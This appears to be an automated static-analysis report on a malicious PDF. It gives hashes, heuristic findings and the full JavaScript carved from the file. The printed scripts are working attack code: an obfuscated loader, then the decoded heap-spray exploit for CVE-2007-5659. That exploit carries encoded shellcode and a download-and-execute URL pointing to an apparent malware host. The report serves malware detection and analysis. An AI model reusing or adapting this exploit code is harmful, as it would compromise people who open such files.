Malicious PDF — malware analysis report

Static analysis result for SHA-256 b45d58e3dc458614…

MALICIOUS

PDF

4.7 KB Created: 2008-08-06 01:42:27 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2013-06-26
MD5: 76585b2d1f9c5207e3569cbada13d420 SHA-1: 2b4cc2066194c4e4d80299ef04403ce4198a16d0 SHA-256: b45d58e3dc4586149452ea18adc3f2cf13cc07178b1d86ca927bd36ce5c329a5
308 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. A high-severity PDF_EVAL heuristic firing suggests the use of eval(), a common technique for obfuscating malicious code. The extracted JavaScript object, javascript_obj0013_001.js, also shows signs of obfuscation. The primary intent appears to be the execution of this script, likely to download and execute a secondary payload, which is a common delivery mechanism for malware. No specific family could be identified due to the obfuscation.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 8

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    function DBH4ncjcU(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function gMpH1nBIDz(WNePXUumO){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(WNePXUumO)"+";"+"}");eval("function t6yyykopTZ8q(f0oXPs){var dTRJqmbr="+"0,XGcURm6Aj28S87=f0oXPs.l"+"en"+"gth,qqFvJ=10"+"2"+"4,aAgCK,ZjOLhexC7kHG,hOxQUOWK='',XeTUp0h0e=dTRJqmbr,Y3nahlmnW551N=dTRJqmbr,vowMKH2mvUGkdy=dTRJqmbr,zPnKDN2=Ar"+"ra"+"y(63,46,53,61,51,2,50,32, …
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://abb192.cn/exp/load.php?id=1518&spl=4 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x367 6469 bytes
SHA-256: a6d8eaa07e1c4360fd0b98c53edb2e1294126394db01105c8489cf616ddb6f56
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). 144 of 214 identifiers look randomly generated (e.g. 'vXcwJXcP5XcPWXBah5TRT9NcdsxzF8GwYi'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
function DBH4ncjcU(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function gMpH1nBIDz(WNePXUumO){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(WNePXUumO)"+";"+"}");eval("function t6yyykopTZ8q(f0oXPs){var dTRJqmbr="+"0,XGcURm6Aj28S87=f0oXPs.l"+"en"+"gth,qqFvJ=10"+"2"+"4,aAgCK,ZjOLhexC7kHG,hOxQUOWK='',XeTUp0h0e=dTRJqmbr,Y3nahlmnW551N=dTRJqmbr,vowMKH2mvUGkdy=dTRJqmbr,zPnKDN2=Ar"+"ra"+"y(63,46,53,61,51,2,50,32,22,26,0,0,0,0,0,0,31,36,13,23,24,29,58,57,25,20,6,55,1,27,10,47,48,12,52,16,40,38,45,9,11,28,5,0,0,0,0,42,0,33,17,44,4,8,7,59,19,54,3,49,56,35,62,14,30,60,0,39,21,15,18,34,41,43,37);f"+"o"+"r(ZjOLhexC7kHG=M"+"at"+"h.c"+"ei"+"l(XGcURm6Aj28S87/"+"qqFvJ)"+";ZjOLhexC7kHG>dTRJqmbr;ZjOLhexC7kHG-"+"-){fo"+"r(aAgCK=Ma"+"th.m"+"in(XGcURm6Aj28S87,qqFvJ);aAgCK>dTRJqmbr;aAgCK-"+"-,XGcURm6Aj28S87-"+"-){vowMKH2mvUGkdy|"+"=(zPnKDN2[f0oXPs.cha"+"rCod"+"eAt(XeTUp0h0e+"+"+)-48])<"+"<Y3nahlmnW551N;if(Y3nahlmnW551N){hOxQUOWK+"+"=gMpH1nBIDz"+"(242^vowMKH2mvUGkdy&"+"2"+"5"+"5);vowMKH2mvUGkdy>"+">="+"8;Y3nahlmnW551N-"+"="+"2;}el"+"se{Y3nahlmnW551N="+"6"+";}}"+"}return (hOxQUOWK);}var gpUEuV=implode('',['v','hlArNBU','kpFcmUxzv0cRY','pH','avu','X7','roGw','9OE6v','hGaYJxaM','iWs','vXe__Uy6h','nyi','Jw','HPfy','exRvX_Lg','VR2pGO08','l_j','1VRW','NEa91','xsCNViJw','HPfyexRv','X','_L4VsC6HzJ_WirgY','VCngOZ1F7Ms','TaDJqkNvN','VRw','9Pvs','34','vMeU','L@cw','A','vX','V','TJY6uNVaDJ','qkNv','N','VRw9Pv0cRJwHPfyexRv','X','_L','4E7f','5H7J5','lUY8','xi5gEVCn','gO','Z1F7E','jqiWXB7C9lar6','xRJwHPfyex','Rv','X_L','sc','RuN','Bz','f6H','AJ1HsYNEOSFW','zrUMcP5','F','sy','pM','1F_','3ivsTRd','oW7vfNVYpG','x0_GOC','N3','4vXcw5fxPbNYA5f','H6vhlArNEVrmy1','ro9Va','5XaGv','_RuX3aY','pH7','box7C_BRC@','TkLMYPC@TkLMYP','C@TkL','MYPC@TPRpX','cC','@DPL@Q','c','C@ekdfg6C@T6','5','jg','6','C@','T65X','qPC','@lVRJYPC','@lV','r','M','YP','C@lVPvgcC@lVNXqkC@eV','RpMcC@eVR','v','XVC@','T','6','P8Q','VC@TVR9','qVC@','l','VRpXV','C@ekJ@XVC@l','VLuX','VC@l6R','v','ck','C@TkrhMPC@l6RvckC@ekKpMkC','@','lVRNYPC@lVRpXcC','@ek','J@','XVC@e','cX','XY','PC@','ekjyYk','C@lVj','ug','PC','@TP','ZXYPC@','lVR','oqPC@lVRpXVC@lc4v','QkC@ecX','@X','cC@DkZyY','kC@ek','f','uqPC@TPZ@gPC@','lV','RoQV','C@l','V','RpXVC@l','c4vQkC@ecX@','MkC@Dc4_YkC','@lP5@QVC@TPZjcVC@','lVRN','cVC@l','VRpXVC','@lc4v','QkC','@ecX','@MP','C@','TP5yYkC@TPR5','qPC@T','PZyQV','C@lVRJQcC','@l','VRpX','V','C@lc4v','QkC@ecXhXVC@ePK_YkC@TP41Q','kC@TPZ','@YkC@lVR5q6C@lVRpXVC@','lc4vQ','k','C@lcRvXc','C@TV','ZhQVC@l645YcC@ekdu','qkC@eVZugc','C@lVNXQk','C@lVRpgVC@ecj','@X','VC@l64vQkC@ek','J','f','XcC@lVP','ogc','C','@lVK_qkC@ek','J','jX','k','C@','eV','Zjgc','C','@TPZ','jg6C@lVR','vc','kC@lVRp','XVC@T6Z','jXVC@e','VfMg6','C@','l6RJyPC@DkNXYkC@lV','RpXVC@ekd@XVC@eVLugcC@eP4v','ckC','@ePRvYcC@ekdjXVC@Dc','RogcC@lP5','y','YkC@lVR','pXVC@','ecRp','XVC','@lc4vckC@T','6fhX','cC@ecd@yVC@ec4vc','kC@','TPZhMkC@lVR_q','VC@','lV','Rp','XVC@lc4pMc','C@ePNfX','VC@ecL@XV','C@','DcjOq','P','C@ePNyqcC@lVP','oXVC','@T641YkC','@l','VRpXVC@','l64oc','PC@','ekJfXVC@lV','Lugc','C@lVK_','qk','C@ekJjXkC@eVZjgcC@lcR','NYkC@lVRp','XVC@T','6f@XVC@e','cZ@y6C@','lc4pMcC@TVkJXc','C@eckJckC@lP5jMcC@','DcR1','qcC@eck5XV','C@lc4vckC@T6f','h','MPC@ecd@gcC@ec4vckC@TP','ZhM','kC@l','V','RJ','McC@l','VR','pXVC@lVR_q','kC@l','64ocPC','@ekJ','fXVC@lVZugcC@lVi','_qkC@ekJ','jXkC@eV','ZjgcC@e','VRNYkC','@lVRpX','VC@','T6','f','@XV','C@ekJucPC@eVRogcC','@l','V','K_qkC@ekJjXkC','@eVZj','g','cC','@lVR','NYkC@lVR','pXVC@','lcKpXVC@ec','i','5ykC@T','PKpMcC@','TPKpMcC','@TPK','pM','cC@T','PKpMcC@TPLhYcC@ecf@XcC@','ekJ','j','Mc','C','@TPi','JqkC@','e','cioc6C@T','P','RocP','C','@ekJjgcC@ekJXYPC@lVZOQPC','@','ecrhckC@ec','X@MPC@l6k','vckC','@ekJMMPC@eVjO','Q','cC@','lVk1YkC@e','cXu','YcC@l6','XhckC@lVk','JXVC','@T','Vko','YcC','@lcdjQkC','@Tkru','g','VC@ePk','pMcC@TVk5g6C@lV5uq6','C@eVRpqP','C@lP','i','9gkC@l','VZOQ','cC@e','PjjqVC@l','VkpXPC@lc','R','ocV','C@','lPKNckC@lPjMykC@','l645gPC','@ecfXqcC','@TP','JhckC@ecfhckC','@lV','kJ','X','cC@T','6XfQPC','@lVLhckC@ekJuykC@e','VLjgkC@DP','r@McC@lV','PvckC@lV','kvckC@','e','cjj','qcC@eP','i5XPC@lV','Rp','MkC@l','PPNYkC@lP5u','qPC','@e','c4ocPC@lcLjyV','C@l','c5','u','XPC@lV','R','ogPC@DkJhc6C','@Dk','5CckC','@ePRJqcC@ek','jjQVC@','ekrhQPC@D','PXfqPC@ePKJQ','PC@e','kKvYPC','@ekfjQ','VC@Dk5Cc6C@ekk5QVC@ekjhQVC@ePKvc','kC@e','kNCc','PC@D','PR','8cPC','@ekJ','hq6C@D','PjfcVC@DPjfqkC@e','Pdf','c6C@Dk5CYPC@D','PivYcC@','TP5f','c','k','SOE6vhlA','rN3','TZMG','PU1g','OkN3','4vXcwJXcP5XcPWXBah5TRT9NcdsxzF8GwYi','xRuXEVrmy1ro9Va','5','X','aGvN','KppW','st9TUvmVRrscRdoW','7','vCgz0nMa','yoTRuX3T','ZMG','PU1gOkN3Kvy','B_U5X','k','H9x1t1esEUVPN','Jc','6MscRdoW7vMe','UL@cwA','v','XV','TJc','R','u','X3aY','p','H','7b','ox7C_B','RC@l65OcPC@l','65OcPSOE6','vMe','UL@cwAvXVTJ','cRuXV7T','_91','NuGO9','Me','UL@cw','A','vX','VTJcK','vCgz0','n','MayoliWXBah5TRU','wW_N','1e','a79x_D8lz','v0cR9fNVYpG','x0','_G','OCN3K','vX','cwJ','X','cP','5XcPMK','3TZMGPU1','gOk','Uc','R','IiW7vyBah','5T','R','3_laffXV0pFz','Sn','cP','WK','ywfpYcRng','xC5x','4U','wW_','N1ea79x_D8l','z','WKywfpYcRngxC5HiHOVRW','N','B','UkpFcmUx','zxi','ywfpYcRngx','C5Gyv0cRJwHPfyexRvX_LXEivCXPl_X7','m8M','TP','vD1AUcRuN','3mvhGaYJ','x','aMiWsv4x6C1','X1X1e','s','5','@c_YF','yV','9OVRWN','B','ah5T','RLJ','YVJFx','7v0c','R','hNT7Yhl','UC8','l','zrvFzrJ','lUE6','WK','JiH','TJ5lUY8xiMsc','R','L','JYVJFx7v0cRLJYV','JFx7Yjl','z5FGAbp','xiEg_VECxKSj3','i','WXBah5TRbUG','101','XPl8DORp','ckv0cRYpHavu','X7ro','Gw9fDP29T','s56EA9oW749T','i5','OVKL','JYV','J','Fx7','YfxUh5','l','c','J_3','PMgE7LCyapNeKb','_GAroya9jqi','MscRM','vxR9yE','AH1gOg5Q1','Zi','XVfMY_50_','Ru0cRN','X','B2','IXV','i9f','H','Ugn','g1rmMa3vgkJ','s','FPON34uX3PvhB2','vfHUgng1','rmM','a3vgkJsNPO','NV4vjqivgTmv','fHUgng','1rmMa3vgkJsFPON','V4vuqiMXVm','oNVibU','G','101XPl8DORpck','xNqy','v0q4vCcRI','hVRbU','G101XPl8DORpc','kx','o','qyv','gcRjOV','R','oF','TR9fHU','g','ng1r','mMa3v','gkJs_PONV4vCqiMXEw','vK','XApv','W7GJXc7nG','_KUy19OE6vhlArNEarCF','c4oGUNN34v@','esCJDA','hNlz9','j32f','NYA5','fG2','fNYA5fWRMscRZ_G','U','ppxi','Z5Y','x4ogA','M_eKpp','W','st9TUv','gcRJMq6f','jqi','v','CeP','zogch','1xwvs','34','vC','e','P','z','o','gch1xwWXVa','91H7YfHspFGASJ_','aE5lz','v0','c','R','k','ixspoWAYf','Hsp','F','Gzb9l','V@oG','Up1','XsIi','x','iWJlaSwW6vjBRp0H','7twcRZ5','Yx','4og','AM_lmMscRuN','3mv4x6C1X1X1es5@c_','YFyV','9OE6']);");eval(t6yyykopTZ8q(gpUEuV));}
generic_stage_recovery_000.js deobfuscated-js generic stage recovery sixbit-xor-table from JavaScript object 13 at offset 0x367 2592 bytes
SHA-256: ee1fa0934f44e55fea7bd193e28245286d0600f518f4e8f8a0056bd2c290cb64
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var jCUAQkd = new Array(); function pZXK8aM(tj35xVFFZ3, GeMMwYq) { while (tj35xVFFZ3.length*2<GeMMwYq){tj35xVFFZ3 += tj35xVFFZ3;} tj35xVFFZ3 = tj35xVFFZ3.substring(0,GeMMwYq/2); return tj35xVFFZ3; } function OblfrKCBRmYEKH() { var SFneUMhMe = 0x0c0c0c0c; var G2JHrQGSBvKV = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u612F%u6262%u3931%u2E32%u6E63%u652F%u7078%u6C2F%u616F%u2E64%u6870%u3F70%u6469%u313D%u3135%u2638%u7073%u3D6C%u0034"); var Q7d1TIMC = 0x400000; var ZTB6kdHgyno = G2JHrQGSBvKV.length * 2; var GeMMwYq = Q7d1TIMC - (ZTB6kdHgyno+0x38); var tj35xVFFZ3 = unescape("%u9090%u9090"); tj35xVFFZ3 = pZXK8aM(tj35xVFFZ3, GeMMwYq); var TjZxyvRdXjwe = (SFneUMhMe - 0x400000)/Q7d1TIMC; for (var Oxu5CFMUeb=0;Oxu5CFMUeb<TjZxyvRdXjwe;Oxu5CFMUeb++) { jCUAQkd[Oxu5CFMUeb] = tj35xVFFZ3 + G2JHrQGSBvKV; } } function n8eIJyyn05XnLD() { var s3Gtlp = app.viewerVersion.toString(); s3Gtlp = s3Gtlp.replace(/\D/g,""); var ckIMI2JwOF54 = new Array(s3Gtlp.charAt(0),s3Gtlp.charAt(1),s3Gtlp.charAt(2)); if ((ckIMI2JwOF54[0] == 8 && ((ckIMI2JwOF54[1] == 1 && ckIMI2JwOF54[2] < 2) || ckIMI2JwOF54[1] < 1)) || (ckIMI2JwOF54[0] == 7 && ckIMI2JwOF54[1] < 1) || (ckIMI2JwOF54[0] < 7)) { OblfrKCBRmYEKH(); var w2WAAaix = unescape("%u0c0c%u0c0c"); while(w2WAAaix.length < 44952) w2WAAaix += w2WAAaix; this.collabStore = Collab.collectEmailInfo({subj: "",msg: w2WAAaix}); } } n8eIJyyn05XnLD();

Open this report in the interactive analyzer, or submit your own file for analysis.